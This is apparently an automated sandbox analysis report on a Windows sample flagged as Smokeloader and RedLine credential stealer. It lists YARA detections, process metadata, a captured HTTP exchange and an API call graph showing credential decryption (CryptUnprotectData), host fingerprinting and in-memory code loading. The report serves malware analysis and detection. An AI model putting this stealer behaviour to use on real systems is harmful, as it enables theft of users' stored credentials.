                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:20 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=gfngblmvdds2fjgijkp1f0405i; expires=Tue, 06 May 2025 04:22:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Obr3EscvfzycGEYY16IkGg6oc7LVWBJDTnfnIksrO%2BIOf8q1i5ukr0ObfJ6%2BW2ptxRUzXfRK4012Urlw2u6enk43yBUkg39LG1G2a6Yl63in8DD05Jao1Rrgr9VAwyv6xwmr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc06808891c461-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1635&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1022&delivery_rate=1754807&cwnd=228&unsent_bytes=0&cid=6076989a994f96af&ts=483&x=0"
                                                                                                                                                                                                            2025-01-10 10:36:20 UTC54INData Raw: 33 30 0d 0a 61 6c 53 48 78 46 4e 7a 5a 42 6a 34 43 44 31 52 5a 30 73 76 35 72 66 44 4a 4e 50 4b 64 6e 73 56 6a 79 4f 48 46 67 51 65 45 38 38 78 43 51 3d 3d 0d 0a
                                                                                                                                                                                                            Data Ascii: 30alSHxFNzZBj4CD1RZ0sv5rfDJNPKdnsVjyOHFgQeE88xCQ==
                                                                                                                                                                                                            2025-01-10 10:36:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:05:36:05
                                                                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\filename.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:392'192 bytes
                                                                                                                                                                                                            MD5 hash:B826127052F19E148F3A0CBE6F33B59C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                            Start time:05:36:19
                                                                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 1856
                                                                                                                                                                                                            Imagebase:0xfe0000
                                                                                                                                                                                                            File size:489'328 bytes
                                                                                                                                                                                                            MD5 hash:F5210A4A7E411A1BAD3844586A74B574
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:5%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:8.9%
                                                                                                                                                                                                              Signature Coverage:69.8%
                                                                                                                                                                                                              Total number of Nodes:315
                                                                                                                                                                                                              Total number of Limit Nodes:30
                                                                                                                                                                                                              execution_graph 26651 43d443 26652 43d460 26651->26652 26652->26652 26653 43d49e 26652->26653 26655 43cce0 LdrInitializeThunk 26652->26655 26655->26653 26656 431742 CoSetProxyBlanket 26956 43f780 26957 43f78f 26956->26957 26960 43f90e 26957->26960 26964 43cce0 LdrInitializeThunk 26957->26964 26958 43fb27 26960->26958 26962 43fa6e 26960->26962 26965 43cce0 LdrInitializeThunk 26960->26965 26961 43b160 RtlFreeHeap 26961->26958 26962->26961 26964->26960 26965->26962 26966 40ca84 CoInitializeSecurity 26657 42a54a 26658 42a630 26657->26658 26661 4375f0 26658->26661 26662 437615 26661->26662 26665 437734 26662->26665 26670 43cce0 LdrInitializeThunk 26662->26670 26663 42a649 26665->26663 26667 43788a 26665->26667 26669 43cce0 LdrInitializeThunk 26665->26669 26667->26663 26671 43cce0 LdrInitializeThunk 26667->26671 26669->26665 26670->26662 26671->26667 26672 43d1cb 26673 43d1d5 26672->26673 26674 43d2ae 26673->26674 26678 43cce0 LdrInitializeThunk 26673->26678 26677 43cce0 LdrInitializeThunk 26674->26677 26677->26674 26678->26674 26679 4198ca 26681 4198d0 26679->26681 26680 419a6f CryptUnprotectData 26682 419a99 26680->26682 26681->26680 26683 40e2ce 26684 40e330 26683->26684 26687 40e3be 26684->26687 26690 43cce0 LdrInitializeThunk 26684->26690 26685 40e4de 26687->26685 26689 43cce0 LdrInitializeThunk 26687->26689 26689->26685 26690->26687 26967 408710 26969 40871f 26967->26969 26968 408a9d ExitProcess 26969->26968 26970 408734 GetCurrentProcessId GetCurrentThreadId 26969->26970 26974 408a86 26969->26974 26971 408771 SHGetSpecialFolderPathW 26970->26971 26972 408769 26970->26972 26976 408850 26971->26976 26972->26971 26980 43cc50 FreeLibrary 26974->26980 26975 4088e6 GetForegroundWindow 26977 408903 26975->26977 26976->26975 26977->26974 26979 40b6b0 FreeLibrary FreeLibrary 26977->26979 26979->26974 26980->26968 26981 416f91 26982 41719e 26981->26982 26983 416f9d 26981->26983 26983->26983 26984 43fe90 LdrInitializeThunk 26983->26984 26984->26982 26691 42ab53 26692 42ab5f FreeLibrary 26691->26692 26694 42ab8e 26692->26694 26694->26694 26695 42ac20 GetComputerNameExA 26694->26695 26696 42ac59 26695->26696 26696->26696 26697 40d253 26698 40d270 26697->26698 26703 437a70 26698->26703 26700 40d338 26701 437a70 10 API calls 26700->26701 26702 40d4d8 26701->26702 26702->26702 26704 437aa0 CoCreateInstance 26703->26704 26706 437cab SysAllocString 26704->26706 26712 4381ee 26704->26712 26709 437d29 26706->26709 26708 438219 GetVolumeInformationW 26715 43823b 26708->26715 26710 437d31 CoSetProxyBlanket 26709->26710 26709->26712 26711 437d51 SysAllocString 26710->26711 26710->26712 26714 437e30 26711->26714 26712->26708 26714->26714 26716 437ea3 SysAllocString 26714->26716 26715->26700 26719 437ecd 26716->26719 26717 4381d5 SysFreeString SysFreeString 26717->26712 26718 4381cb 26718->26717 26719->26717 26719->26718 26720 437f11 VariantInit 26719->26720 26722 437f60 26720->26722 26721 4381ba VariantClear 26721->26718 26722->26721 26723 40a253 26724 40a350 26723->26724 26724->26724 26727 40af30 26724->26727 26726 40a3a6 26730 40afd0 26727->26730 26729 40aff5 26729->26726 26730->26729 26731 43cc70 26730->26731 26732 43ccc3 26731->26732 26733 43cc90 26731->26733 26735 43cca4 26731->26735 26736 43ccb8 26731->26736 26738 43b160 26732->26738 26733->26732 26733->26735 26737 43cca9 RtlReAllocateHeap 26735->26737 26736->26730 26737->26736 26739 43b173 26738->26739 26740 43b175 26738->26740 26741 43b18b RtlFreeHeap 26738->26741 26739->26736 26740->26741 26741->26736 26985 40d693 26989 4097c0 26985->26989 26987 40d69b CoUninitialize 26988 40d6c0 26987->26988 26990 4097d4 26989->26990 26990->26987 26742 8daa16 26743 8daa25 26742->26743 26746 8db1b6 26743->26746 26748 8db1d1 26746->26748 26747 8db1da CreateToolhelp32Snapshot 26747->26748 26749 8db1f6 Module32First 26747->26749 26748->26747 26748->26749 26750 8daa2e 26749->26750 26751 8db205 26749->26751 26753 8dae75 26751->26753 26754 8daea0 26753->26754 26755 8daee9 26754->26755 26756 8daeb1 VirtualAlloc 26754->26756 26755->26755 26756->26755 26757 42ac5f 26759 42ac6b GetComputerNameExA 26757->26759 26760 42b6dd 26761 42b6e4 26760->26761 26762 42b787 GetPhysicallyInstalledSystemMemory 26761->26762 26763 42b7b0 26762->26763 26763->26763 26991 42051d 26992 420520 26991->26992 26992->26992 26993 43fe90 LdrInitializeThunk 26992->26993 26994 4205d1 26993->26994 26995 43d69c 26996 43d6b0 26995->26996 26998 43d75f 26996->26998 26999 43cce0 LdrInitializeThunk 26996->26999 26999->26998 27005 4203a0 27006 420400 27005->27006 27007 4203ae 27005->27007 27007->27006 27009 41f140 LdrInitializeThunk 27007->27009 27009->27006 27010 43b1a0 27011 43b1d0 27010->27011 27013 43b24e 27011->27013 27018 43cce0 LdrInitializeThunk 27011->27018 27013->27013 27015 43b423 27013->27015 27017 43b35e 27013->27017 27019 43cce0 LdrInitializeThunk 27013->27019 27014 43b160 RtlFreeHeap 27014->27015 27017->27014 27018->27013 27019->27017 27020 42e029 27023 414910 27020->27023 27022 42e02e CoSetProxyBlanket 27023->27022 26764 42ba6d 26765 42ba90 26764->26765 26765->26765 26766 42bb5e 26765->26766 26768 43cce0 LdrInitializeThunk 26765->26768 26768->26766 26769 40e672 26770 40e680 26769->26770 26774 40e712 26770->26774 26870 43cce0 LdrInitializeThunk 26770->26870 26771 40e8ce 26791 422bf0 26771->26791 26774->26771 26871 43cce0 LdrInitializeThunk 26774->26871 26776 40e907 26804 423300 26776->26804 26778 40e923 26823 4235c0 26778->26823 26780 40e942 26842 425b20 26780->26842 26784 40e973 26862 428690 26784->26862 26786 40e97c 26866 427810 26786->26866 26788 40e998 26789 431e20 6 API calls 26788->26789 26790 40e9bd 26789->26790 26792 422c50 26791->26792 26792->26792 26793 422c7d RtlExpandEnvironmentStrings 26792->26793 26795 422cc0 26793->26795 26794 422d3b RtlExpandEnvironmentStrings 26798 422d5b 26794->26798 26799 422e61 26794->26799 26801 422d7c 26794->26801 26803 423047 26794->26803 26795->26794 26795->26798 26795->26799 26795->26801 26795->26803 26797 423031 GetLogicalDrives 26800 43fe90 LdrInitializeThunk 26797->26800 26798->26776 26799->26797 26799->26798 26799->26799 26799->26803 26800->26803 26801->26801 26872 43fe90 26801->26872 26803->26798 26876 420b40 26803->26876 26805 423390 26804->26805 26805->26805 26806 4233b0 RtlExpandEnvironmentStrings 26805->26806 26807 423400 26806->26807 26809 423473 26807->26809 26810 423721 26807->26810 26813 423452 RtlExpandEnvironmentStrings 26807->26813 26822 42358f 26807->26822 26898 43f130 RtlFreeHeap LdrInitializeThunk 26807->26898 26897 41f0c0 RtlFreeHeap LdrInitializeThunk 26809->26897 26899 43ee70 26810->26899 26813->26807 26813->26809 26813->26810 26813->26822 26817 43ed40 LdrInitializeThunk 26820 423786 26817->26820 26818 424531 26818->26818 26911 43f450 RtlFreeHeap LdrInitializeThunk 26818->26911 26819 424380 26912 43cce0 LdrInitializeThunk 26819->26912 26820->26817 26820->26818 26820->26819 26820->26820 26822->26778 26824 4235ce 26823->26824 26825 43ed40 LdrInitializeThunk 26824->26825 26828 42343a 26825->26828 26827 42358f 26827->26780 26828->26827 26829 423721 26828->26829 26830 423473 26828->26830 26834 423452 RtlExpandEnvironmentStrings 26828->26834 26917 43f130 RtlFreeHeap LdrInitializeThunk 26828->26917 26831 43ee70 2 API calls 26829->26831 26916 41f0c0 RtlFreeHeap LdrInitializeThunk 26830->26916 26833 423752 26831->26833 26835 43ed40 LdrInitializeThunk 26833->26835 26836 423786 26833->26836 26834->26827 26834->26828 26834->26829 26834->26830 26835->26836 26837 424531 26836->26837 26839 43ed40 LdrInitializeThunk 26836->26839 26840 424380 26836->26840 26837->26837 26918 43f450 RtlFreeHeap LdrInitializeThunk 26837->26918 26839->26836 26919 43cce0 LdrInitializeThunk 26840->26919 26843 425b40 26842->26843 26846 425bde 26843->26846 26920 43cce0 LdrInitializeThunk 26843->26920 26844 40e96a 26850 426030 26844->26850 26846->26844 26849 425d1e 26846->26849 26921 43cce0 LdrInitializeThunk 26846->26921 26847 43b160 RtlFreeHeap 26847->26844 26849->26847 26922 426050 RtlFreeHeap LdrInitializeThunk 26850->26922 26852 426044 26852->26784 26853 426039 26853->26852 26923 438e40 RtlFreeHeap LdrInitializeThunk 26853->26923 26855 426a30 26931 43cce0 LdrInitializeThunk 26855->26931 26856 43fcf0 LdrInitializeThunk 26861 4266f0 26856->26861 26860 42671a 26860->26784 26861->26855 26861->26856 26861->26860 26861->26861 26924 440030 LdrInitializeThunk 26861->26924 26925 440100 26861->26925 26863 428730 26862->26863 26863->26863 26864 42874d RtlExpandEnvironmentStrings 26863->26864 26865 428680 26864->26865 26865->26786 26865->26865 26867 427850 26866->26867 26867->26867 26868 427888 RtlExpandEnvironmentStrings 26867->26868 26869 4278d0 26868->26869 26869->26869 26870->26774 26871->26771 26873 43feb0 26872->26873 26874 43ffde 26873->26874 26888 43cce0 LdrInitializeThunk 26873->26888 26874->26799 26889 43fcf0 26876->26889 26878 4213dc 26878->26798 26879 42133c 26881 43b160 RtlFreeHeap 26879->26881 26883 42134e 26881->26883 26882 420b83 26882->26878 26886 420c4f 26882->26886 26893 43cce0 LdrInitializeThunk 26882->26893 26883->26878 26895 43cce0 LdrInitializeThunk 26883->26895 26886->26879 26887 43b160 RtlFreeHeap 26886->26887 26894 43cce0 LdrInitializeThunk 26886->26894 26887->26886 26888->26874 26890 43fd10 26889->26890 26891 43fe3e 26890->26891 26896 43cce0 LdrInitializeThunk 26890->26896 26891->26882 26893->26882 26894->26886 26895->26883 26896->26891 26897->26822 26898->26807 26901 43ee90 26899->26901 26900 423752 26900->26820 26907 43ed40 26900->26907 26903 43eeee 26901->26903 26913 43cce0 LdrInitializeThunk 26901->26913 26903->26900 26906 43efdf 26903->26906 26914 43cce0 LdrInitializeThunk 26903->26914 26904 43b160 RtlFreeHeap 26904->26900 26906->26904 26906->26906 26909 43ed60 26907->26909 26908 43ee3f 26908->26820 26909->26908 26915 43cce0 LdrInitializeThunk 26909->26915 26911->26819 26912->26822 26913->26903 26914->26906 26915->26908 26916->26827 26917->26828 26918->26840 26919->26827 26920->26846 26921->26849 26922->26853 26923->26861 26924->26861 26926 440120 26925->26926 26929 44017e 26926->26929 26932 43cce0 LdrInitializeThunk 26926->26932 26927 44022e 26927->26861 26929->26927 26933 43cce0 LdrInitializeThunk 26929->26933 26931->26860 26932->26929 26933->26927 27024 43d7b1 27025 43d7be 27024->27025 27026 43d7b0 27024->27026 27026->27024 27026->27025 27028 43cce0 LdrInitializeThunk 27026->27028 27028->27025 26934 40c8f6 CoInitializeEx CoInitializeEx 27029 43ce34 27030 43ce3d GetForegroundWindow 27029->27030 27031 43ce50 27030->27031 27032 43b13b RtlAllocateHeap 26935 410b7a 26936 410b94 26935->26936 26937 410df8 RtlExpandEnvironmentStrings 26936->26937 26941 40f1a1 26936->26941 26938 410e6b 26937->26938 26939 410f25 RtlExpandEnvironmentStrings 26938->26939 26938->26941 26939->26941 26942 410fa0 26939->26942 26943 415660 26942->26943 26944 415680 26943->26944 26944->26944 26945 43fcf0 LdrInitializeThunk 26944->26945 26946 4157ad 26945->26946 26947 4159de 26946->26947 26948 4157cf 26946->26948 26953 415803 26946->26953 26954 440030 LdrInitializeThunk 26946->26954 26947->26941 26948->26947 26950 440100 LdrInitializeThunk 26948->26950 26948->26953 26950->26953 26952 415a05 26953->26947 26955 43cce0 LdrInitializeThunk 26953->26955 26954->26948 26955->26952 27033 247003c 27034 2470049 27033->27034 27048 2470e0f SetErrorMode SetErrorMode 27034->27048 27039 2470265 27040 24702ce VirtualProtect 27039->27040 27042 247030b 27040->27042 27041 2470439 VirtualFree 27046 24705f4 LoadLibraryA 27041->27046 27047 24704be 27041->27047 27042->27041 27043 24704e3 LoadLibraryA 27043->27047 27045 24708c7 27046->27045 27047->27043 27047->27046 27049 2470223 27048->27049 27050 2470d90 27049->27050 27051 2470dad 27050->27051 27052 2470238 VirtualAlloc 27051->27052 27053 2470dbb GetPEB 27051->27053 27052->27039 27053->27052

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00437A70 Relevance: 35.7, APIs: 11, Strings: 9, Instructions: 735memorycomCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 437a70-437a95 1 437aa0-437ab2 0->1 1->1 2 437ab4-437ac9 1->2 3 437ad0-437afd 2->3 3->3 4 437aff-437b45 3->4 5 437b50-437b70 4->5 5->5 6 437b72-437b91 5->6 8 437b93-437ba8 6->8 9 437bfc-437c07 6->9 11 437bb0-437bed 8->11 10 437c10-437c49 9->10 10->10 13 437c4b-437ca5 CoCreateInstance 10->13 11->11 12 437bef-437bf4 11->12 12->9 14 437cab-437cdf 13->14 15 438209-438239 call 43e770 GetVolumeInformationW 13->15 16 437ce0-437cfe 14->16 20 438243-438245 15->20 21 43823b-43823f 15->21 16->16 18 437d00-437d2b SysAllocString 16->18 26 437d31-437d4b CoSetProxyBlanket 18->26 27 4381f8-438205 18->27 22 438267-43826e 20->22 21->20 24 438270-438277 22->24 25 438287-438299 22->25 24->25 28 438279-438285 24->28 29 4382a0-4382b4 25->29 30 437d51-437d67 26->30 31 4381ee-4381f4 26->31 27->15 28->25 29->29 32 4382b6-4382d5 29->32 33 437d70-437da4 30->33 31->27 35 4382e0-438302 32->35 33->33 36 437da6-437e26 SysAllocString 33->36 35->35 37 438304-43832f call 41de20 35->37 38 437e30-437ea1 36->38 43 438330-438338 37->43 38->38 40 437ea3-437ecf SysAllocString 38->40 44 4381d5-4381ea SysFreeString * 2 40->44 45 437ed5-437ef7 40->45 43->43 46 43833a-43833c 43->46 44->31 53 4381cb-4381d1 45->53 54 437efd-437f00 45->54 47 438342-438352 call 408150 46->47 48 438250-438261 46->48 47->48 48->22 51 438357-43835e 48->51 53->44 54->53 55 437f06-437f0b 54->55 55->53 56 437f11-437f59 VariantInit 55->56 57 437f60-437f8e 56->57 57->57 58 437f90-437fa2 57->58 59 437fa6-437fa8 58->59 60 4381ba-4381c7 VariantClear 59->60 61 437fae-437fb4 59->61 60->53 61->60 62 437fba-437fc4 61->62 63 437fc6-437fcd 62->63 64 437ffd-437fff 62->64 66 437fdc-437fe0 63->66 65 438001-43801b call 4080d0 64->65 75 438021-43802d 65->75 76 438154-438174 65->76 67 437fe2-437feb 66->67 68 437fd0 66->68 70 437ff2-437ff6 67->70 71 437fed-437ff0 67->71 73 437fd1-437fda 68->73 70->73 74 437ff8-437ffb 70->74 71->73 73->65 73->66 74->73 75->76 77 438033-43803b 75->77 78 438176-43818c 76->78 79 4381ad-4381b6 call 4080e0 76->79 81 438040-43804a 77->81 78->79 82 43818e-4381a4 78->82 79->60 84 438060-438066 81->84 85 43804c-438051 81->85 82->79 86 4381a6-4381a9 82->86 88 438085-438097 84->88 89 438068-43806b 84->89 87 438100-438104 85->87 86->79 92 438106-43810e 87->92 90 43811a-438123 88->90 91 43809d-4380a0 88->91 89->88 93 43806d-438083 89->93 90->92 96 438125-438128 90->96 91->90 94 4380a2-4380fa 91->94 92->76 95 438110-438112 92->95 93->87 94->87 95->81 97 438118 95->97 98 438150-438152 96->98 99 43812a-43814e 96->99 97->76 98->87 99->87
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00437C9D
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(07B905B6), ref: 00437D05
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(CAF053BA,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437D43
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(A81AAA16), ref: 00437DAB
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(0ECC08BC), ref: 00437EA8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(A5A4ABB2), ref: 00437F16
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004381F9
                                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438235
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                                                                                                                                                              • String ID: $cB$0NuNup=Nu$C$\L$\L$nohi$v=$y>$}qrs
                                                                                                                                                                                                              • API String ID: 505850577-2634092947
                                                                                                                                                                                                              • Opcode ID: 8891c8da7b40583088632feed2e56bd3770d32be4c709d5240878b9ad7387b87
                                                                                                                                                                                                              • Instruction ID: cc161b6a6c57cf11917052797987524347fde2a2052227c3707b455a90f51f2d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8891c8da7b40583088632feed2e56bd3770d32be4c709d5240878b9ad7387b87
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D32EF71A083508FE714CF64C89076BBBE1EB89310F14892DF9D59B381DB78D906CB96
                                                                                                                                                                                                              Function 00410B7A Relevance: 23.5, APIs: 2, Strings: 11, Instructions: 785COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 100 410b7a-410b92 101 410b94-410b97 100->101 102 410bc0-410bea call 401880 101->102 103 410b99-410bbe 101->103 106 410bec-410bef 102->106 103->101 107 410bf1-410c37 106->107 108 410c39-410c5f call 401880 106->108 107->106 111 410c61-410c8d call 414500 108->111 112 410c63-410c67 108->112 120 410c91-410cd2 call 4080d0 call 40a7d0 111->120 121 410c8f 111->121 114 41170a 112->114 115 4121e4 114->115 117 4121e6-4121e9 call 401f40 115->117 127 40f1b4-40f1da call 401f50 117->127 128 40f1ad-4121fa 117->128 132 410cd4-410cd7 120->132 121->120 134 40f1dc-40f1df 127->134 135 410cd9-410d28 132->135 136 410d2a-410d51 call 401880 132->136 137 40f1e1-40f1f6 134->137 138 40f1f8-40f21a call 401e40 134->138 135->132 143 410da3-410dd0 call 414500 136->143 144 410d53-410d74 call 414500 136->144 137->134 146 40f21c-40f245 138->146 147 40f21e 138->147 152 410dd2 143->152 153 410dd4-410e69 call 4080d0 call 40a7d0 RtlExpandEnvironmentStrings 143->153 155 410d76 144->155 156 410d78-410da1 call 4080d0 call 40a7d0 144->156 154 40f249-40f24c 146->154 147->117 152->153 170 410e6b-410e6e 153->170 158 40f2aa-40f2ff call 401980 154->158 159 40f24e-40f2a8 154->159 155->156 156->143 158->115 168 40f305 158->168 159->154 168->115 171 410e70-410ed5 170->171 172 410ed7-410ee4 170->172 171->170 173 410f00-410f19 172->173 174 410ee6-410efb call 4080e0 172->174 175 410f1b 173->175 176 410f1d-410f73 call 4080d0 RtlExpandEnvironmentStrings 173->176 174->114 175->176 182 410fa0-410fcf call 4080e0 176->182 183 410f75-410f9b call 4080e0 * 2 176->183 192 410fd1-410fd4 182->192 198 411708 183->198 194 411001-41101f call 401880 192->194 195 410fd6-410fff 192->195 200 411021-411068 call 414500 194->200 201 4110a0-4110b8 194->201 195->192 198->114 208 41106a 200->208 209 41106c-41109c call 4080d0 call 40a7d0 200->209 202 4110ba-4110bd 201->202 204 411102-411146 call 401b90 202->204 205 4110bf-411100 202->205 212 411149-41114c 204->212 205->202 208->209 209->201 214 4111aa-4111d8 call 401a90 212->214 215 41114e-4111a8 212->215 220 4115c7-411646 call 408ca0 call 415660 214->220 221 4111de-41124b call 401f40 214->221 215->212 229 41164b-41165f call 4097c0 220->229 227 41124d 221->227 228 41124f-411272 call 4080d0 221->228 227->228 233 4112a2-4112a8 228->233 234 411274-411282 228->234 238 411661-411672 229->238 239 411696-4116c7 call 4080e0 * 2 229->239 237 4112aa-4112ac 233->237 240 411284-411295 call 414620 234->240 242 4112b3-4112f5 call 401f50 237->242 243 4112ae 237->243 248 411674 238->248 249 411686-411692 call 4080e0 238->249 271 4116c9-4116d5 call 4080e0 239->271 272 4116da-4116e7 239->272 256 411297 240->256 257 411299-4112a0 240->257 259 4112f7-4112fa 242->259 243->220 254 411676-411682 call 4147a0 248->254 249->239 265 411684 254->265 256->240 257->233 263 411322-411362 call 401880 259->263 264 4112fc-411320 259->264 270 411364-411367 263->270 264->259 265->249 275 411436-41147e call 401880 270->275 276 41136d-411431 270->276 271->272 273 4116e9-4116f5 call 4080e0 272->273 274 4116fa-411706 call 408d80 272->274 273->274 274->198 285 411480-411483 275->285 276->270 286 411485-4114c5 285->286 287 4114c7-411516 call 401b90 285->287 286->285 290 41151d-411520 287->290 291 411522-411556 290->291 292 411558-4115c2 call 401b90 call 414640 290->292 291->290 292->237
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: +$0$0$S$X$Z$[$l$n$r$~
                                                                                                                                                                                                              • API String ID: 0-3752990600
                                                                                                                                                                                                              • Opcode ID: 6748b20905f0a59a808ec4d1197bd9751c67a00e6889925f8079b97ae6e61d50
                                                                                                                                                                                                              • Instruction ID: fcf71eb36b81d8820df2b731dc9560538e6f095d8e2f441b6ca90ab2514b3ab9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6748b20905f0a59a808ec4d1197bd9751c67a00e6889925f8079b97ae6e61d50
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3962D43260C7908BC3249B38C4953EFBBD1ABC5324F198A3ED5E9973D1D67988858B47
                                                                                                                                                                                                              Function 00420B40 Relevance: 20.6, Strings: 16, Instructions: 641COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
